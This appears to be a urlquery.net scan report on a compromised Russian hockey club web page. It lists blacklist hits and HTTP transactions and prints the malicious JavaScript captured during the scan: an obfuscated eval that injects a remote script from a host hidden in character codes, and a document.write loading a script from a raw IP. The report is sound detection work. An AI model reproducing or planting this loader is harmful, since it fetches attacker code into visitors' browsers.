Overview

URL hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
IP195.208.1.119
ASNAS25535 Autonomous Non-commercial Organization 'Regional Network Information Center'
Location Russian Federation
Report completed2019-02-11 06:49:38 CET
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2019-02-11 2 hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roma (...) Malware
2019-02-11 2 hcmaster.ru/assets/template/script/jquery-1.11.3.js Malware
2019-02-11 2 hcmaster.ru/assets/template/plugin/owl_carousel/owl.carousel.min.js Malware
2019-02-11 2 hcmaster.ru/assets/template/script/form.js Malware
2019-02-11 2 hcmaster.ru/assets/template/plugin/fancybox/jquery.fancybox.pack.js Malware
2019-02-11 2 hcmaster.ru/assets/template/script/main.js Malware
2019-02-11 2 hcmaster.ru/assets/template/image/image/fav1.ico Malware
2019-02-11 2 134.249.116.78/jquery.js Malware
2019-02-11 2 185.143.221.14/?key=jELb8ThlZZ0lGKvjzQy021gUsAZQSACs Malware
2019-02-11 2 sd5doozry8.com/ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d Malware
2019-02-11 2 www.learningtoolkit.club/link.php?ver=2 Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 195.208.1.119

Date UQ / IDS / BL URL IP
2019-06-10 22:28:48 +0200
0 - 1 - 0 iftp.ru/ 195.208.1.119
2019-06-09 14:41:17 +0200
0 - 3 - 10 hcmaster.ru/incommodity 195.208.1.119
2019-06-04 09:49:27 +0200
0 - 0 - 23 limaxbatteries.com/tvuxjj2/wc7jang.php 195.208.1.119
2019-05-27 04:59:46 +0200
0 - 5 - 10 hcmaster.ru/haematologist_300803665 195.208.1.119
2019-05-26 03:17:12 +0200
0 - 0 - 1 hcmaster.ru/renvoigoldeneye 195.208.1.119
2019-05-24 08:18:50 +0200
0 - 3 - 10 hcmaster.ru/299807961_nammanamma 195.208.1.119
2019-05-24 08:17:32 +0200
0 - 4 - 10 hcmaster.ru/300341462-stupendously 195.208.1.119
2019-05-23 09:40:06 +0200
0 - 3 - 10 hcmaster.ru/ 195.208.1.119
2019-05-16 16:12:45 +0200
0 - 3 - 11 hcmaster.ru/298746131-millimespeak/speak/cf17 (...) 195.208.1.119
2019-05-16 15:17:39 +0200
0 - 4 - 10 hcmaster.ru/prodigious/2792159_wretchedness.love 195.208.1.119

Last 10 reports on ASN: AS25535 Autonomous Non-commercial Organization 'Regional Network Information Center'

Date UQ / IDS / BL URL IP
2019-06-15 16:53:42 +0200
0 - 0 - 10 www.teslateam.online 195.208.1.105
2019-06-11 00:14:58 +0200
0 - 6 - 0 ist.spb.su/ 195.208.1.132
2019-06-10 22:28:48 +0200
0 - 1 - 0 iftp.ru/ 195.208.1.119
2019-06-10 20:31:36 +0200
0 - 0 - 1 millenniumplaza.ru/vdu1mdv0enhmodgyoxv4 195.208.1.105
2019-06-10 20:22:11 +0200
0 - 0 - 1 npobastion.ru/catalog/istochniki-pitaniya-dly (...) 195.208.1.167
2019-06-10 19:53:04 +0200
0 - 0 - 1 v2.amtrade-eng.ru/sources/primary/cont/onstep (...) 195.208.1.107
2019-06-10 19:37:41 +0200
0 - 0 - 1 ostmedic.ru/netflix-web-serveraccounts-www 195.208.1.105
2019-06-10 19:15:03 +0200
0 - 0 - 1 socio-research.ru/new/s-mg5.mail.yahoo.com.htm 195.208.1.107
2019-06-10 18:49:22 +0200
0 - 4 - 1 stomatologia.spb.su/sites/default/files/ctool (...) 178.210.89.119
2019-06-10 18:49:21 +0200
0 - 4 - 1 stomatologia.spb.su/sites/default/files/ctool (...) 178.210.89.119

Last 10 reports on domain: hcmaster.ru

Date UQ / IDS / BL URL IP
2019-06-09 14:41:17 +0200
0 - 3 - 10 hcmaster.ru/incommodity 195.208.1.119
2019-05-27 04:59:46 +0200
0 - 5 - 10 hcmaster.ru/haematologist_300803665 195.208.1.119
2019-05-26 03:17:12 +0200
0 - 0 - 1 hcmaster.ru/renvoigoldeneye 195.208.1.119
2019-05-24 08:18:50 +0200
0 - 3 - 10 hcmaster.ru/299807961_nammanamma 195.208.1.119
2019-05-24 08:17:32 +0200
0 - 4 - 10 hcmaster.ru/300341462-stupendously 195.208.1.119
2019-05-23 09:40:06 +0200
0 - 3 - 10 hcmaster.ru/ 195.208.1.119
2019-05-16 16:12:45 +0200
0 - 3 - 11 hcmaster.ru/298746131-millimespeak/speak/cf17 (...) 195.208.1.119
2019-05-16 15:17:39 +0200
0 - 4 - 10 hcmaster.ru/prodigious/2792159_wretchedness.love 195.208.1.119
2019-05-16 14:28:12 +0200
0 - 4 - 10 hcmaster.ru/fascismob0d5fdo-284755327-utopiat (...) 195.208.1.119
2019-05-15 01:38:34 +0200
0 - 3 - 11 hcmaster.ru/penetrative1c0679e-ramble_304734600 195.208.1.119


JavaScript

Executed Scripts (7)


Executed Evals (1)

#1 JavaScript::Eval (size: 611, repeated: 1) - SHA256: 56b32752f34f320b6e1e4ab77e520801479d805028c79d4c47baf49dfeced197

                                        var somestring = document.createElement('script');
somestring.type = 'text/javascript';
somestring.async = true;
somestring.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 101, 120, 97, 109, 104, 111, 109, 101, 46, 110, 101, 116, 47, 115, 116, 97, 116, 46, 106, 115, 63, 118, 61, 49, 46, 48, 46, 50);
var alls = document.getElementsByTagName('script');
var nt3 = true;
for (var i = alls.length; i--;) {
    if (alls[i].src.indexOf(String.fromCharCode(101, 120, 97, 109, 104, 111, 109, 101)) > -1) {
        nt3 = false;
    }
}
if (nt3 == true) {
    document.getElementsByTagName("head")[0].appendChild(somestring);
}
                                    

Executed Writes (1)

#1 JavaScript::Write (size: 55, repeated: 1) - SHA256: b1247cfc4a293243fe51e76445f0c7fbdec493b931a59e722826bf77015b9514

                                        < script src = "http://134.249.116.78/jquery.js" > < /script>
                                    


HTTP Transactions (41)


Request Response
                                        
                                            GET /the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: MODX Revolution
Set-Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; expires=Mon, 18-Feb-2019 05:48:56 GMT; Max-Age=604800; path=/; HttpOnly browser=standard; expires=Mon, 18-Feb-2019 05:48:57 GMT; Max-Age=604800; path=/; httponly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   43215
Md5:    97ef0f326bb17bf0a3ec3a6afdbbeb03
Sha1:   9510a3497e0084f080826645728fd9fa31371fb9
Sha256: e1a2304c8212e8bfa02992153807d1da540fb103041c92b1c0d7683dbeec726d

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /assets/template/style/normalize-4.1.1.css HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 7278
Connection: keep-alive
Last-Modified: Thu, 11 Aug 2016 18:55:47 GMT
Etag: "57acca33-1c6e"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII English text
Size:   7278
Md5:    fc852e6163cb2c0f3a6375bd02b989a6
Sha1:   0fbcdd2442991b69033715164e074757e74c919e
Sha256: 1635aa1c8e1b26ef21319ae45f2e76b6f96f2dc087a1c931a61621e38fe80c66
                                        
                                            GET /assets/template/fonts/styles.css HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 7584
Connection: keep-alive
Last-Modified: Sat, 20 Aug 2016 11:22:27 GMT
Etag: "57b83d73-1da0"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text
Size:   7584
Md5:    9364a0451a113740ceaecb92ea20297d
Sha1:   095f74b3ca483606cb0becaa3c21bb0f7ddcd7d6
Sha256: 16080ec90f15bd71ea2ee2915cda17047c56d01222640175eb186c95c9e03bf4
                                        
                                            GET /assets/template/plugin/owl_carousel/assets/owl.carousel.css HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 4614
Connection: keep-alive
Last-Modified: Thu, 11 Aug 2016 18:55:47 GMT
Etag: "57acca33-1206"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII C program text
Size:   4614
Md5:    b51416af9e8adbe3d16f5f2526aba221
Sha1:   097c8d67412f44534449ed4cadc6dd22b025801d
Sha256: dd7b97c7ad9d7b3eb79bdc728bcbc6a7ab8e3d5db0421fb0dd16d34f3dc88277
                                        
                                            GET /assets/template/plugin/fancybox/jquery.fancybox.css HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 4895
Connection: keep-alive
Last-Modified: Thu, 11 Aug 2016 18:55:46 GMT
Etag: "57acca32-131f"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII C program text
Size:   4895
Md5:    6c55951ce1e3115711f63f99b7501f3a
Sha1:   5f163444617b6cf267342f06ac166a237bb62df9
Sha256: 968a8e56e4adaf8c135199ebd7f6cc065424ca45974d4dfbeb5607e69fe72fcd
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         216.58.207.195
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Mon, 11 Feb 2019 05:48:57 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    0fea75198090d1580a3a1750aa282919
Sha1:   154ec8280208ea0be8cf1073bbe1c6d0eddd41fc
Sha256: d11953a680268bde1c701bb6d85f75fb812d878f2efb3a4b937c4dad53607d39
                                        
                                            GET /assets/template/style/skeleton-2.0.4.css HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 23161
Connection: keep-alive
Last-Modified: Sun, 18 Sep 2016 12:33:54 GMT
Etag: "57de89b2-5a79"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  UTF-8 Unicode C program text, with CRLF line terminators
Size:   23161
Md5:    ebbfae37e8f41a14b87e61de43966dd7
Sha1:   6c46f78a3e1f5d38b2f9bd7a159becbb3c95cf5e
Sha256: fb4c24318ba0289647395bbf6c32bb3584394a2004b9dfa8a4d16322183549dd
                                        
                                            POST /gsr2 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 112
Content-Type: application/ocsp-request

                                         
                                         216.58.207.195
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Mon, 11 Feb 2019 05:48:57 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 468
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   468
Md5:    d9d754520ae3340aa37cca6115eee05b
Sha1:   a0320372760d99c762cb2eb4b37f776625ef1b33
Sha256: 7dc8284c51c9a38dc1bf03bd28857ea5336e8f5c564eddbb1c9082ee43c93738
                                        
                                            GET /assets/template/style/main.css HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 68998
Connection: keep-alive
Last-Modified: Wed, 12 Apr 2017 19:32:47 GMT
Etag: "58ee80df-10d86"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII C program text, with very long lines
Size:   68998
Md5:    cc0addb87067588bb32a43309557a482
Sha1:   fe997c60f64dbc7d4a8982997fa2d61a6cf92c51
Sha256: 6aef6eb3e3ea46bb3b8bc2014244fba5253eb01d8dceec285a74a17d10e52c39
                                        
                                            GET /assets/template/script/jquery-1.11.3.js HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 7942
Connection: keep-alive
Last-Modified: Thu, 27 Sep 2018 02:19:49 GMT
Etag: "5bac3e45-1f06"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines
Size:   7942
Md5:    13793f1b78b81ba2cf1dbd33bba7cf3c
Sha1:   2d1932e46d03af7cf7197903875004f45470f2cf
Sha256: ca12180f4e90561ce7f32d36bc526fbc24a7a218ba0413cfd6f70161160dbbe4

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /assets/template/plugin/owl_carousel/owl.carousel.min.js HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 431
Connection: keep-alive
Last-Modified: Thu, 19 Jul 2018 09:03:35 GMT
Etag: "5b5053e7-1af"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines, with no line terminators
Size:   431
Md5:    1cae0711eccb3a109fb3fb29c3880a9d
Sha1:   7d8fd3a80efc4163a5c9811a2e43f4bd5da60435
Sha256: 1ba5509373ed47e261ae5cd6e79147e710f0cd177ab1afaf95ed172caefb3035

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /assets/template/script/form.js HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 431
Connection: keep-alive
Last-Modified: Thu, 19 Jul 2018 09:03:35 GMT
Etag: "5b5053e7-1af"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines, with no line terminators
Size:   431
Md5:    1cae0711eccb3a109fb3fb29c3880a9d
Sha1:   7d8fd3a80efc4163a5c9811a2e43f4bd5da60435
Sha256: 1ba5509373ed47e261ae5cd6e79147e710f0cd177ab1afaf95ed172caefb3035

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /assets/template/style/media.css HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 31463
Connection: keep-alive
Last-Modified: Wed, 12 Apr 2017 19:34:02 GMT
Etag: "58ee812a-7ae7"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII C program text, with very long lines
Size:   31463
Md5:    dea4aad6e8e85f1145fd9a35c2672715
Sha1:   32a23f297e639a820f15dfc6db59c7f1588185ed
Sha256: 78bf02dc4ea5163abe2e7e7a219c3e16faa939ab621b49b2dc575994d17ff87c
                                        
                                            GET /assets/template/plugin/fancybox/jquery.fancybox.pack.js HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 7942
Connection: keep-alive
Last-Modified: Thu, 27 Sep 2018 02:19:49 GMT
Etag: "5bac3e45-1f06"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines
Size:   7942
Md5:    13793f1b78b81ba2cf1dbd33bba7cf3c
Sha1:   2d1932e46d03af7cf7197903875004f45470f2cf
Sha256: ca12180f4e90561ce7f32d36bc526fbc24a7a218ba0413cfd6f70161160dbbe4

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /assets/template/script/main.js HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 431
Connection: keep-alive
Last-Modified: Thu, 19 Jul 2018 09:03:35 GMT
Etag: "5b5053e7-1af"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines, with no line terminators
Size:   431
Md5:    1cae0711eccb3a109fb3fb29c3880a9d
Sha1:   7d8fd3a80efc4163a5c9811a2e43f4bd5da60435
Sha256: 1ba5509373ed47e261ae5cd6e79147e710f0cd177ab1afaf95ed172caefb3035

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /assets/template/style/animate.css HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 72259
Connection: keep-alive
Last-Modified: Thu, 11 Aug 2016 18:55:47 GMT
Etag: "57acca33-11a43"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII English text
Size:   72259
Md5:    07f146141537e04ee282a965d8053198
Sha1:   5bac0162dbfcfd0c701b8d0848411a288c27a2c2
Sha256: d34c3af0d3b74cbb878ca4472668ebae02410ed1bfe8e85b244bb582d1dcb2ea
                                        
                                            GET /assets/template/image/image/logo.png HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 5835
Connection: keep-alive
Last-Modified: Thu, 11 Aug 2016 19:15:34 GMT
Etag: "57acced6-16cb"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 106 x 109, 8-bit/color RGBA, non-interlaced
Size:   5835
Md5:    96dde3c6ee2f6c9f25c4c55b57fe4c21
Sha1:   06ba9d26e7f0e5b04354b2df173e35cc0ad5a8e3
Sha256: ed7d45dc1e0c4deabb338ee788e5c51260fdb4f5fba99218236543df57ca5436
                                        
                                            GET /assets/cache_image/source/news/1W0A7021_48x48_07f.jpg HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 5910
Connection: keep-alive
Last-Modified: Fri, 13 Oct 2017 15:24:13 GMT
Etag: "59e0da9d-1716"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   5910
Md5:    7cfb4763b650477641cf5f08912a9b99
Sha1:   5ad4fcad327e483c3dff77252e2a711e99392975
Sha256: fea0e57a8cbd85cffa54cd53059aae6c823d3cb233cf5bc455946801ff05b83b
                                        
                                            GET /assets/cache_image/source/news/18921132_1890685824290227_20211078272281866_o_48x48_07f.jpg HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
